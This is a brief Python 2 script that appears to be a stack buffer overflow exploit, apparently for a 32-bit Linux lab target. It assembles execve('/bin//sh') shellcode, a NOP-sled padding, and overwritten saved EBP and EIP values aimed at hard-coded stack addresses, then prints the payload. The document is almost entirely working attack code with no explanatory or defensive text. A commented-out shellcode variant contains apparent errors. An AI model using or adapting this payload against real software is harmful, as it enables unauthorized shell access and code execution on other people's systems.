144
#{shellcode|fill}{new_ebp}{new_eip}
#\______________/\_______/\_______/
#       136          4        4

def addr_to_chrs(addr):
    byte_lst = [(addr >> shift) & 0xff
                for shift in xrange(0, 32, 8)]
    return ''.join(map(chr, byte_lst))

#shellcode = (''
#'\xbc\xd0\xfb\xff\xbf'  # mov esp, 0xbffffbd0
#'\x31\xdb'              # xor ebx, ebx
#'\x31\xc9'              # xor ecx,ecx
#'\xf7\xe9'              # imul ecx
#'\0x51'                 # push ecx
#'\x04\x0b'              # add al,0xb
#'\xeb\x08'              # jmp short 0x11
#'\x5e'                  # pop esi
#'\x87\xe6'              # xchg esp,esi
#'\x99'                  # cdq
#'\x87\xdc'              # xchg ebx,esp
#'\xcd\x80'              # int 0x80
#'\xe8\xf3\xff\xff\xff'  # call dword 0x9
#'\xbc\xd0\xfb\xff\xbf'  # /bin//sh
#)

shellcode = ("\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80")

fill = (137 - len(shellcode)) * chr(0x90)
new_ebp = addr_to_chrs(0xbffffbf0)
new_eip = addr_to_chrs(0xbffffbb0)
print shellcode + fill + new_ebp + new_eip
